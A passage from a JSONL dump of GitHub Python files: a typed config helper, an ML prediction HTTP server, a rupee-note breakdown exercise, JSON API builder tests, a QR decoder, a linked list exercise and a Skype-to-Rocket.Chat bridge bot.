t.Optional[t.List[bytes]]: optional(decouple.Csv(str.encode)),\n}\n\n\ndef is_optional(type_: t.Type) -> bool:\n \"\"\"Return True if the given type is t.Optional[SomeType]\"\"\"\n try:\n orig, args = type_.__origin__, type_.__args__\n except AttributeError:\n return False\n return ((orig == t.Union) and (len(args) == 2) and (type(None) in args))\n\n\nclass TypedConfig(object):\n \"\"\"\n Build a configuration object out of the annotations of the subclass.\n \"\"\"\n\n def __init__(self, casts: t.Optional[t.Mapping[SomeType, CastType]] = None, ignored_names: t.Container[str] = ()) -> None:\n \"\"\"\n Supply or replace the attributes of the subclass with the configured values\n according to their type annotations and defaults.\n \"\"\"\n casts = {**default_casts, 
**(casts or {})}\n for name, type_ in self.__annotations__.items():\n if name.startswith('_') or name in ignored_names:\n continue\n cfg = functools.partial(decouple.config, name, cast=casts[type_])\n if hasattr(self, name): # Subclass has a default value\n attribute = getattr(self, name)\n setattr(self, name, cfg(default=attribute))\n elif is_optional(type_): # default=None\n setattr(self, name, cfg(default=None))\n else:\n setattr(self, name, cfg())\n","repo_name":"kojiromike/typed-config","sub_path":"typed_config.py","file_name":"typed_config.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1379987061","text":"\ntry:\n import SocketServer as socketserver\n from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\nexcept ImportError:\n import socketserver\n from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom MLMain import MlMain\nfrom os import listdir\nfrom os.path import isfile, join\n\nversion = 'NOVER'\n\nclass S(BaseHTTPRequestHandler):\n\tglobalMlMain = MlMain()\n\n\tdef setup(self):\n\t\tBaseHTTPRequestHandler.setup(self)\n\t\tself.request.settimeout(0.2)\n\n\tdef _set_headers(self):\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type', 'text/html')\n\t\tself.end_headers()\n\n\tdef do_GET(self):\n\t\tself.wfile.write(\"Get Request\".encode('utf-8'))\n\n\tdef do_HEAD(self):\n\t\tself._set_headers()\n\n\tdef do_POST(self):\n\t\t'''\n\t\tHandle POST requests.\n\t\t'''\n\t\t#print('The Request: %s' % (self.path))\n\t\t#requestStr = urllib2.unquote((self.path));\n\t\t#requestStr = unquote(self.path)\n\n\t\tpred = self.globalMlMain.mlMain(version,self.path, 'COMBINED_LSTM10_DENSE36_DENSE24')\n\t\t\n\t \t# the response\n\t\tself.wfile.write(pred.encode('utf-8'))\n\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=9998):\n\tserver_address = ('', port)\n\thttpd = server_class(server_address, handler_class)\n\tprint('Starting MLServer...')\n\tprint('Listening on port ' + str(port))\n\thttpd.serve_forever()\n\n\n\nif __name__ == \"__main__\":\n\tfrom sys import argv\n\t\n\tif len(argv) == 3:\n\t\tversion = str(argv[2])\n\t\trun(port=int(argv[1]))\n\telif len(argv) == 2:\n\t\tversion = \"V1\"\n\t\trun(port=int(argv[1]))\n\telse:\n\t\tprint('not enough argv')","repo_name":"josephkamel/F2MD","sub_path":"machine-learning-server/MLServer.py","file_name":"MLServer.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"40"} +{"seq_id":"71250051322","text":"#wap to enter an amount in rupees(integer) and print number of 1000,500,100,50,20,10,5 and 1 rupees \n# notes that will be equivalent to the amount entered\n\namount = int(input(\"enter the amount in rupees: \")) \nprint(\"the amount is: \", amount)\n# for_thousand = 0\n# for_fivehundred = 0\n# for_hundred = 0\n# for_fifty = 0\n# for_twenty = 0\n# for_ten = 0\n# for_five = 0\n# for_one = 0\n# new_amount = 0\n\n#e.g - 1995\n\n\n\ndef check_thousand(amount):\n for_thousand = 0\n for_thousand = amount // 1000\n amount = amount - (for_thousand * 1000)\n print(\"it has \" + str(for_thousand) + \" thousand\")\n if amount >= 500 and amount < 1000:\n check_fivehundred(amount)\n elif amount >= 100 and amount < 500:\n check_hundred(amount)\n elif amount >= 50 and amount < 100:\n check_fifty(amount)\n elif amount >= 20 and amount < 50:\n check_twenty(amount)\n elif amount >=10 and amount < 20:\n check_ten(amount)\n elif amount 
>=5 and amount < 10:\n        check_five(amount)\n    elif amount >=1 and amount < 5:\n        check_one(amount)\n\n\n
def check_fivehundred(amount):\n    for_fivehundred = 0\n    for_fivehundred = amount // 500\n    amount = amount - (for_fivehundred * 500)\n    print(\"it has \" + str(for_fivehundred) + \" five-hundred\")\n    if amount >= 100 and amount < 500:\n        check_hundred(amount)\n    elif amount >= 50 and amount < 100:\n        check_fifty(amount)\n    elif amount >= 20 and amount < 50:\n        check_twenty(amount)\n    elif amount >=10 and amount < 20:\n        check_ten(amount)\n    elif amount >=5 and amount < 10:\n        check_five(amount)\n    elif amount >=1 and amount < 5:\n        check_one(amount)\n\n
def check_hundred(amount):\n    for_hundred = 0\n    for_hundred = amount // 100\n    amount = amount - (for_hundred * 100)\n    print(\"it has \" + str(for_hundred) + \" hundred\")\n    if amount >= 50 and amount < 100:\n        check_fifty(amount)\n    elif amount >= 20 and amount < 50:\n        check_twenty(amount)\n    elif amount >=10 and amount < 20:\n        check_ten(amount)\n    elif amount >=5 and amount < 10:\n        check_five(amount)\n    elif amount >=1 and amount < 5:\n        check_one(amount)\n\n\n
def check_fifty(amount):\n    for_fifty = 0\n    for_fifty = amount // 50\n    amount = amount - (for_fifty * 50)\n    print(\"it has \" + str(for_fifty) + \" fifty\")\n    if amount >= 20 and amount < 50:\n        check_twenty(amount)\n    elif amount >=10 and amount < 20:\n        check_ten(amount)\n    elif amount >=5 and amount < 10:\n        check_five(amount)\n    elif amount >=1 and amount < 5:\n        check_one(amount)\n\n
def check_twenty(amount):\n    for_twenty = 0\n    for_twenty = amount // 20\n    amount = amount - (for_twenty * 20)\n    print(\"it has \" + str(for_twenty) + \" twenty\")\n    if amount >= 10 and amount < 20:\n        check_ten(amount)\n    elif amount >= 5 and amount < 10:\n        check_five(amount)\n    elif amount >=1 and amount < 5:\n        check_one(amount)\n\n
def check_ten(amount):\n    for_ten = 0\n    for_ten = amount // 10\n    amount = amount - (for_ten * 10)\n    print(\"it has \" + str(for_ten) + \" ten\")\n    if amount >= 5 and amount < 10:\n        check_five(amount)\n    elif amount >= 1 and amount < 5:\n        check_one(amount)\n\n
def check_five(amount):\n    for_five = 0\n    for_five = amount // 5\n    amount = amount - (for_five * 5)\n    print(\"it has \" + str(for_five) + \" five\")\n    if amount >= 1 and amount < 5:\n        check_one(amount)\n\n
def check_one(amount):\n    for_one = 0\n    for_one = amount // 1\n    amount = amount - (for_one * 1)\n    print(\"it has \" + str(for_one) + \" one\")\n\n
check_thousand(amount)\n\n
# print(\"it breaks down to \" + str(for_thousand) + \" thousand and \" + str(for_fivehundred) + \" five hundred and \" + str(for_hundred) + \" hundred and \" + str(for_fifty) + \" fifty and \" + str(for_twenty) + \" twenty and \" + str(for_ten) + \" ten and \" + str(for_five) + \" five and \" +str(for_one) + \" one\")\n\n\n
# if amount > 1000 :\n#     for_thousand = amount // 1000 #1\n#     amount = amount - (for_thousand * 1000) #995\n#     if amount < 1000:\n#         if amount > 500:\n#             for_fivehundred = amount // 500 #1\n#             amount = amount - (for_fivehundred * 500) #495\n#         elif amount == 500:\n#             for_fivehundred = 1\n#         if amount < 500:\n#             if amount > 100 and amount < 500:\n#                 for_hundred = amount // 100 #4\n#                 amount = amount - (for_hundred * 100) #95\n#             elif amount == 100:\n#                 
for_hundred = 1\n# if amount < 100:\n# if amount > 50 and amount < 100:\n# for_fifty = amount // 50 #1\n# amount = amount - (for_fifty * 50) #45\n# elif amount == 50:\n# for_fifty = 1\n# if amount < 50:\n# if amount > 20 and amount < 50:\n# for_twenty = amount // 20 #2\n# amount = amount - (for_twenty * 20) #5\n# elif amount == 20:\n# for_twenty = 1\n# if amount < 20:\n# if amount > 10 and amount < 20:\n# for_ten = amount // 10 \n# amount = amount - (for_ten * 10)\n \n# elif amount == 10:\n# for_ten = 1\n# if amount < 10:\n# if amount > 5 and amount < 10:\n# for_five = amount // 5\n# amount = amount - (for_five * 5)\n\n# elif amount == 5:\n# for_five = 1\n# if amount < 5:\n# if amount > 1 and amount < 5:\n# for_one = amount // 1\n# amount = amount - (for_one * 1)\n# elif amount == 1:\n# for_one = 1\n\n \n\n\n\n \n'''elif amount == 1000:\n for_thousand = 1\n\nelif amount < 1000:\n print(\"in the second loop\")\n if amount > 500:\n for_fivehundred = amount // 500 #1\n amount = amount - (for_fivehundred * 500) #495\n elif amount == 500:\n for_fivehundred = 1\n\n elif amount > 100 and amount < 500:\n for_hundred = amount // 100 #4\n amount = amount - (for_hundred * 100) #95\n \n elif amount == 100:\n for_hundred = 1\n\n elif amount > 50 and amount < 100:\n for_fifty = amount // 50 #1\n amount = amount - (for_fifty * 50) #45\n\n elif amount == 50:\n for_fifty = 1\n elif amount > 20 and amount < 50:\n for_twenty = amount // 20 #2\n amount = amount - (for_twenty * 20) #5\n elif amount == 20:\n for_twenty = 1\n\n elif amount > 10 and amount < 20:\n for_ten = amount // 10 \n amount = amount - (for_ten * 10)\n \n elif amount == 10:\n for_ten = 1\n\n elif amount > 5 and amount < 10:\n for_five = amount // 5\n amount = amount - (for_five * 5)\n\n elif amount == 5:\n for_five = 1\n\n elif amount > 1 and amount < 5:\n for_one = amount // 1\n amount = amount - (for_one * 1)\n elif amount == 1:\n for_one = 1\n \n '''\n\n\n\n\n\n\n\n ","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_1/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4475975401","text":"import pytest\nfrom typing import Optional\nfrom datetime import date\nfrom typing import ForwardRef\nfrom src import JsonApiResource, resource_id, attribute, relationship\nfrom src.json_api_call_context import JsonApiCallContext\nfrom src.json_api_resource_builder import build_resource\n\n\nclass BaseResource(JsonApiResource):\n @staticmethod\n def base_url() -> str:\n return \"http://some.url\"\n\n\ndef test_builds_resource_with_id():\n class Resource(BaseResource):\n id: str = resource_id()\n\n result = build_resource(JsonApiCallContext(data={\"id\": \"42\"}), Resource())\n\n assert result.id == \"42\"\n\n\ndef test_builds_resource_with_attributes():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n result = build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": \"value\"}}),\n Resource(),\n )\n\n assert result.attribute1 == \"value\"\n\n\ndef test_builds_resource_with_decoded_attributes():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: date = attribute(decoder=date.fromisoformat)\n\n result = build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": \"2019-07-04\"}}),\n Resource(),\n )\n\n assert result.attribute1 == date(2019, 7, 4)\n\n\ndef 
test_builds_resource_raises_type_error():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n with pytest.raises(TypeError, match=r\".* attribute1 .*\"):\n build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": 1}}),\n Resource(),\n )\n\n\ndef test_builds_resource_with_relationship_not_in_included():\n class Relationship(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n }\n ),\n Resource(),\n )\n\n assert result.relationship1.id == \"42\"\n\n\ndef test_build_resource_with_relationship():\n class Relationship(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n },\n included=[\n {\n \"id\": \"42\",\n \"type\": \"relationships\",\n \"attributes\": {\"attribute1\": \"value\"},\n }\n ],\n ),\n Resource(),\n )\n\n assert result.relationship1.id == \"42\"\n assert result.relationship1.attribute1 == \"value\"\n\n\ndef test_build_resource_with_optional_relationship():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Optional[Relationship] = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\"id\": \"100\", \"relationships\": {\"relationship1\": {\"data\": None}}}\n ),\n Resource(),\n )\n\n assert result.relationship1 is None\n\n\ndef test_build_resource_with_non_optional_relationship_raise_error():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n with pytest.raises(ValueError, match=r\".* relationship1 .*\"):\n build_resource(\n JsonApiCallContext(\n data={\"id\": \"100\", \"relationships\": {\"relationship1\": {\"data\": None}}}\n ),\n Resource(),\n )\n\n\ndef test_build_resource_raises_if_relationship_is_not_optional():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n with pytest.raises(ValueError, match=r\".* relationship1 .*\"):\n build_resource(\n JsonApiCallContext(data={\"id\": \"100\", \"relationships\": {}}), Resource()\n )\n\ndef test_build_resource_with_cyclic_dependency():\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: ForwardRef(\"Relationship\") = relationship()\n\n class Relationshup(BaseResource):\n id: str = resource_id()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n }\n ),\n Resource(),\n )\n\n assert result.relationship1.id == 
\"42\"\n\n","repo_name":"NilssonPL/json-api-smart","sub_path":"test/unit_test/test_json_api_resource_builder.py","file_name":"test_json_api_resource_builder.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"31815585810","text":"from pathlib import Path\nimport qrtools\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom pyzbar.pyzbar import decode\n\nclass decoder:\n def __init__(self,shapekey,Folderpath):\n self.shapekey=shapekey\n self.Folderpath=Folderpath\n self.decode()\n\n def decode(self):\n \n one_d_array=[]\n paths = sorted(Path(self.Folderpath).iterdir(), key=os.path.getmtime)\n for i in range(len(paths)):\n filename=str(paths[i])\n if \"code\" in filename:\n file=filename\n result=decode(Image.open(file))\n \n for i in result:\n c=i.data.decode(\"utf-8\")\n d=len(c)\n cleaned_c=c[1:d-1]\n list=cleaned_c.split(\",\")\n for i in list:\n one_d_array.append(int(i))\n \n def extract_shapekey(c):\n d=c.split(\",\")\n e=d[0]\n f=d[1]\n g=e.split(\"(\")\n h=f.split(\")\")\n part_1=g[1]\n part_2=h[0]\n shapekey=(int(part_1),int(part_2))\n return shapekey \n\n shapekey=extract_shapekey(self.shapekey) \n cleaned_one_d_array=np.array(one_d_array)\n #reforming the array back to the original shape\n extracted_array=np.asarray(cleaned_one_d_array).reshape(shapekey)\n #convert back array to image and showing the image\n #extracted_array.astype(\"float64)\"\n extracted_image=Image.fromarray(np.uint8(extracted_array)).convert('RGB')\n extracted_image.show()\n extracted_image.save()\n\n\n\n \n","repo_name":"Surya2709/Steganography-With-QR-Codes","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40362541786","text":"class Node:\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LinkedList:\n\tdef __init__(self):\n\t\tself.head = None\n\t\t#self.count = None\n\n\tdef get_count(self):\n\t\thead = self.head\n\t\tcount = 0\n\t\twhile(head):\n\t\t\tcount += 1\n\t\t\thead = head.next\t\n\t\treturn count\n\n\tdef traversal(self):\n\t\tif self.head is None:\n\t\t\tprint('Empty!')\n\t\telse:\n\t\t\thead = self.head\n\t\t\twhile(head):\n\t\t\t\tprint(head.data)\n\t\t\t\thead = head.next\n\n\tdef insert_beginning(self,new_node):\n\t\tnew_node = Node(new_node)\n\t\tif self.head is None:\n\t\t\tprint('Empty')\n\t\telse:\n\t\t\tnew_node.next = self.head\n\t\t\tself.head = new_node\n\t\tself.traversal()\t\n\t\n\tdef insert_end(self,new_node):\n\t\tnew_node = Node(new_node)\n\t\thead = self.head\n\t\twhile (head.next):\n\t\t\thead = head.next\n\t\thead.next = new_node\n\t\tself.traversal()\n\t\n\tdef insert_at_pos(self,pos,new_node):\n\t\tnew_node = Node(new_node)\n\t\tself.length = self.get_count()\n\t\tprint('printing count value',self.length)\n\t\tif pos > self.length or pos < 0:\n\t\t\treturn None\n\t\telse:\n\t\t\tif pos == 0 :\n\t\t\t\tself.insert_beginning(new_node)\n\t\t\t\tprint('inserted at beg')\n\t\t\telse: \n\t\t\t\tif pos == self.length:\n\t\t\t\t\tself.insert_end(new_node)\n\t\t\t\t\tprint('inserted at end')\n\t\t\t\telse:\n\t\t\t\t\tprint('gonna inserted at pos')\n\t\t\t\t\tcurrent = self.head\n\t\t\t\t\tcount = 1\n\t\t\t\t\twhile count < pos-1 :\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tcurrent = current.next\n\t\t\t\t\tnew_node.next = current.next\n\t\t\t\t\tcurrent.next = new_node\n\t\t\t\t\tself.length += 
\t\tself.traversal()\n\n
\tdef del_node(self,value):\n\t\tlength = self.get_count()\n\t\t# head = self.head\n\t\t# if length == 0:\n\t\t# \tprint('list is empty')\n\t\t# else:\n\t\t# \tif(head is not None):\n\t\t# \t\tif(head.data == value):\n\t\t# \t\t\tself.head = self.head.next\n\t\t# \t\t\tlength -= 1\n\t\t# \twhile(head is not None):\n\t\t# \t\tif (head.data == value):\n\t\t# \t\t\tbreak\n\t\t# \t\ttemp = head\n\t\t# \t\thead = temp.next\n\t\t# \ttemp.next = head.next\n\t\t# \thead = None\n\t\tif value is None:\n\t\t\treturn\n\t\tif value.next is None:\n\t\t\t# the shift-left trick below cannot delete the tail (temp would be\n\t\t\t# unbound), so unlink the tail by walking from the head instead\n\t\t\tif self.head is value:\n\t\t\t\tself.head = None\n\t\t\telse:\n\t\t\t\tprev = self.head\n\t\t\t\twhile prev.next is not value:\n\t\t\t\t\tprev = prev.next\n\t\t\t\tprev.next = None\n\t\telse:\n\t\t\t# copy each successor's data one node left, then drop the last node\n\t\t\twhile value.next is not None:\n\t\t\t\ttemp = value\n\t\t\t\tvalue.data = temp.next.data\n\t\t\t\tvalue = value.next\n\t\t\ttemp.next = None\n\t\tself.traversal()\n\n\n
linklist = LinkedList()\nlinklist.head = Node(6)\nlink2 = Node(12)\nlink3 = Node(18)\nlink4 = Node(24)\nlink5 = Node(30)\nprint('printing link5',link5)\nlinklist.head.next = link2\nlink2.next = link3\nlink3.next = link4\nlink4.next = link5\n\n
# linklist.traversal()\n# linklist.insert_end()\n# linklist.insert_beginning()\nlinklist.get_count()\n# linklist.insert_at_pos(3,14)\nlinklist.del_node(link2)","repo_name":"kskeerthana/DSA","sub_path":"LinkedLists/singlelinked.py","file_name":"singlelinked.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70858635321","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport requests\nimport json\nimport magic\nimport html\nimport markdown_strings as md\nimport pytz\nimport re\n\n
from skpy import Skype\nfrom skpy import SkypeEventLoop\nfrom skpy import SkypeNewMessageEvent\nfrom skpy import SkypeEditMessageEvent\nfrom skpy import SkypeContacts\nfrom skpy import SkypeContactGroup\nfrom skpy import SkypeMessageEvent\nfrom skpy import SkypeConnection\n\nfrom bs4 import BeautifulSoup\n\nfrom datetime import datetime\n\n
app_username = os.environ.get(\"SKYPE_USERNAME\")\nif not app_username:\n    print(\"missing config SKYPE_USERNAME\")\n    sys.exit(1)\n\n
app_password = os.environ.get(\"SKYPE_PASSWORD\")\nif not app_password:\n    print(\"missing config SKYPE_PASSWORD\")\n    sys.exit(1)\n\n
rocketchat_url = os.environ.get(\"ROCKETCHAT_URL\")\nif not rocketchat_url:\n    print(\"missing config ROCKETCHAT_URL\")\n    sys.exit(1)\n\n
skype_bot_id = os.environ.get(\"SKYPE_BOT_ID\")\nif not skype_bot_id:\n    print(\"missing config SKYPE_BOT_ID\")\n    sys.exit(1)\n\n
rocketchat_api = os.environ.get(\"ROCKETCHAT_API\")\nif not rocketchat_api:\n    print(\"missing config ROCKETCHAT_API\")\n    sys.exit(1)\n\n
rocketchat_x_auth_token = os.environ.get(\"ROCKETCHAT_X_Auth_Token\")\nif not rocketchat_x_auth_token:\n    print(\"missing config ROCKETCHAT_X_Auth_Token\")\n    sys.exit(1)\n\n
rocketchat_x_user_id = os.environ.get(\"ROCKETCHAT_X_User_Id\")\nif not rocketchat_x_user_id:\n    print(\"missing config ROCKETCHAT_X_User_Id\")\n    sys.exit(1)\n\n
sk=Skype(app_username, app_password,\"/opt/skype-rocketchat-bridge/.tokens\")\nsk.chats\n\nprint(\"Skype to Rocket Chat Bridge Started\")\n\n
def process_msg(msg):\n\n    # Skype rich-text markup -> Rocket.Chat markdown; the opening tag strings\n    # below follow skpy's wire format and should be read as an assumption,\n    # since the originals did not survive in this copy\n    msg = msg.replace(\"<b raw_pre=\\\"*\\\" raw_post=\\\"*\\\">\",\"*\")\n    msg = msg.replace(\"</b>\",\"*\")\n\n    msg = msg.replace(\"<i raw_pre=\\\"_\\\" raw_post=\\\"_\\\">\",\"_\")\n    msg = msg.replace(\"</i>\",\"_\")\n\n    msg = msg.replace(\"<s raw_pre=\\\"~\\\" raw_post=\\\"~\\\">\",\"~\")\n    msg = msg.replace(\"</s>\",\"~\")
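\n\n    # e.g. 'hi <b raw_pre=\"*\" raw_post=\"*\">there</b>' becomes 'hi *there*'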
    \",\"\")\n    msg = msg.replace(\"
    \",\"\")\n    msg = msg.replace(\"
    \",\"\")\n\n msg = re.sub('<(/)?ss( type=\"\\w+\")?>', '', msg)\n msg = msg.replace(\"\",\"\")\n\n msg = re.sub(']*>', '*@', msg)\n msg = msg.replace(\"\",\"*\")\n \n msg = re.sub(']+href=\\\"(.*?)\\\"[^>]*>', '', msg)\n msg = msg.replace(\"\",\"\")\n\n return msg\n\ndef process_quote_msg(msg,msg_id,msg_channel):\n soup = BeautifulSoup(msg, 'html.parser')\n q_msg = (soup.find('legacyquote').next_sibling)\n for msgs in sk.chats[msg_channel].getMsgs():\n if msgs.id == msg_id:\n q_msg = process_msg(msgs.content)\n return q_msg\n\n\nclass MySkype(SkypeEventLoop):\n def onEvent(self, event):\n if isinstance(event,(SkypeNewMessageEvent, SkypeEditMessageEvent, SkypeMessageEvent)):\n\n if os.path.exists('skype-bot.log'):\n logF = open(\"skype-bot.log\", \"a\", encoding=\"utf-8\")\n else:\n logF = open(\"skype-bot.log\", \"w\", encoding=\"utf-8\")\n\n log_prefix = event.msg.id\n \n try:\n logF.write(log_prefix + \": Start processing message.\" + '\\n')\n logF.write(log_prefix + \": Message ID : \" + event.msg.id + '\\n')\n logF.write(log_prefix + \": Message type : \" + event.msg.type + '\\n')\n except:\n pass\n\n if hasattr(sk.contacts.user(event.msg.userId),'name'):\n sender_name = str(getattr(sk.contacts.user(event.msg.userId), 'name'))\n logF.write(log_prefix + \": Sender Id found : \" + event.msg.userId + '\\n')\n logF.write(log_prefix + \": Sender name found : \" + sender_name + '\\n')\n else:\n sender_name = event.msg.userId\n\n if hasattr(sk.contacts.user(event.msg.userId),'avatar'):\n sender_avatar = sk.contacts.user(event.msg.userId).avatar\n if sender_avatar is not None:\n logF.write(log_prefix + \": Sender avatar found : \" + sender_avatar + '\\n')\n else:\n sender_avatar = \"https://vignette.wikia.nocookie.net/logopedia/images/f/fb/Skype_Logo_2019.svg/revision/latest/scale-to-width-down/340?cb=20191207211056\"\n\n if hasattr(sk.chats.chat(event.msg.chatId),'topic'):\n chattopic=sk.chats.chat(event.msg.chatId).topic\n logF.write(log_prefix + \": Chat Topic found : \" + chattopic + '\\n')\n else:\n chattopic=\"skype-bot-private-message\"\n\n message_content = event.msg.content\n logF.write(log_prefix + \": Message Content : \" + message_content + '\\n')\n processed_message = process_msg(message_content)\n\n data_set = {\n \"text\": processed_message,\n \"avatar\": sender_avatar,\n \"channel\": chattopic,\n \"from\":{\n \"id\":event.msg.userId,\n \"name\":sender_name\n },\n \"conversation\": {\n \"id\":event.msg.chatId\n }\n }\n \n try:\n print(event.msg)\n except:\n pass\n \n if (event.msg.type ==\"RichText/UriObject\" or event.msg.type ==\"RichText/Media_GenericFile\") and event.msg.userId != skype_bot_id:\n logF.write(log_prefix + \": Message File Name : \" + event.msg.file.name + '\\n')\n\n file_attach = open(event.msg.file.name,\"wb\")\n file_attach.write(event.msg.fileContent)\n file_attach.close()\n\n api_url = rocketchat_api+\"rooms.info?roomName=\"+chattopic\n X_Auth_Token=\"'X-Auth-Token': '\" + rocketchat_x_auth_token + \"'\"\n X_User_Id=\"'X-User-Id': '\" + rocketchat_x_user_id + \"'\"\n\n contentType=\"Content-Type:text/plain\"\n\n headers = {'X-Auth-Token' : rocketchat_x_auth_token , 'X-User-Id' : rocketchat_x_user_id }\n room_info = requests.get(api_url, headers = headers)\n\n parsed_json = (json.loads(room_info.text))\n room = parsed_json['room']\n room_id = room['_id']\n\n api_url = 'https://chat.majasolutions.net/api/v1/rooms.upload/'+room_id\n files = { 'file': (event.msg.file.name, open(event.msg.file.name, 'rb'),magic.from_file(event.msg.file.name, mime=True)),}\n 
bot_msg = {'msg' : 'File ' + magic.from_file(event.msg.file.name) + ' sent by ' + sender_name}\n upload_file = requests.post(api_url, data = bot_msg, headers = headers, files = files)\n logF.write(log_prefix + \": Upload File Status : \" + str(upload_file.status_code) + '\\n')\n if os.path.exists(event.msg.file.name):\n os.remove(event.msg.file.name)\n \n elif (event.msg.type ==\"RichText/Media_AudioMsg\") and event.msg.userId != skype_bot_id:\n audio_msg = BeautifulSoup(event.msg.content, 'html.parser')\n if len(audio_msg.find_all('uriobject')) > 0:\n attributes_dictionary = audio_msg.find('uriobject').attrs\n audio_file_url = attributes_dictionary['url_thumbnail']\n\n download_conn = SkypeConnection()\n download_conn.soapLogin(app_username,app_password)\n resp = download_conn(\"GET\", audio_file_url, auth=SkypeConnection.Auth.Authorize)\n\n if len(audio_msg.find_all('originalname')) > 0:\n attributes_dictionary = audio_msg.find('originalname').attrs\n audio_file_name = attributes_dictionary['v']\n open(audio_file_name,'wb').write(resp.content)\n \n logF.write(log_prefix + \": Message File Name : \" + audio_file_name + '\\n')\n\n api_url = rocketchat_api+\"rooms.info?roomName=\"+chattopic\n X_Auth_Token=\"'X-Auth-Token': '\" + rocketchat_x_auth_token + \"'\"\n X_User_Id=\"'X-User-Id': '\" + rocketchat_x_user_id + \"'\"\n\n contentType=\"Content-Type:text/plain\"\n \n headers = {'X-Auth-Token' : rocketchat_x_auth_token , 'X-User-Id' : rocketchat_x_user_id }\n room_info = requests.get(api_url, headers = headers)\n\n parsed_json = (json.loads(room_info.text))\n room = parsed_json['room']\n room_id = room['_id']\n\n api_url = 'https://chat.majasolutions.net/api/v1/rooms.upload/'+room_id\n files = { 'file': (audio_file_name, open(audio_file_name, 'rb'),magic.from_file(audio_file_name, mime=True)),} \n bot_msg = {'msg' : 'File ' + magic.from_file(audio_file_name) + ' sent by ' + sender_name + '\\n' +\n 'If the audio file is not complete, please hear it at the skype web or skype client.'\n }\n upload_file = requests.post(api_url, data = bot_msg, headers = headers, files = files)\n logF.write(log_prefix + \": Upload File Status : \" + str(upload_file.status_code) + '\\n')\n \n if os.path.exists(audio_file_name):\n os.remove(audio_file_name)\n\n else:\n SoupText = BeautifulSoup(processed_message, 'html.parser')\n if len(SoupText.find_all('quote')) > 0:\n attributes_dictionary = SoupText.find('quote').attrs\n tz = pytz.timezone('Asia/Kuala_Lumpur')\n ts = datetime.fromtimestamp(int(attributes_dictionary['timestamp']), tz)\n quote_orig_msg_id = attributes_dictionary['messageid']\n quote_author = attributes_dictionary['authorname']\n quote_msg_timestamp = ts.strftime('%Y-%m-%d %H:%M:%S %Z')\n quote_channel = event.msg.chatId\n\n new_msg = SoupText.find('quote').next_sibling\n quote_msg = process_quote_msg(processed_message,quote_orig_msg_id,quote_channel)\n\n data_set_attachment = {\n \"text\": new_msg,\n \"attachment\": {\n \"color\": '#0000DD',\n \"title\": quote_author + \" @ \" + quote_msg_timestamp,\n \"text\": quote_msg\n }\n }\n data_set.update(data_set_attachment)\n\n json_dump = json.dumps(data_set)\n logF.write(log_prefix + \": Message Sent : \" + json_dump + '\\n')\n\n if event.msg.userId != skype_bot_id:\n send_message = requests.post(rocketchat_url,data=json_dump)\n logF.write(log_prefix + \": Send Message Status : \" + str(send_message.status_code) + '\\n')\n\n logF.write(\"\\n\")\n\n logF.close()\n\nsk = MySkype(tokenFile=\"/opt/skype-rocketchat-bridge/.tokens\", 
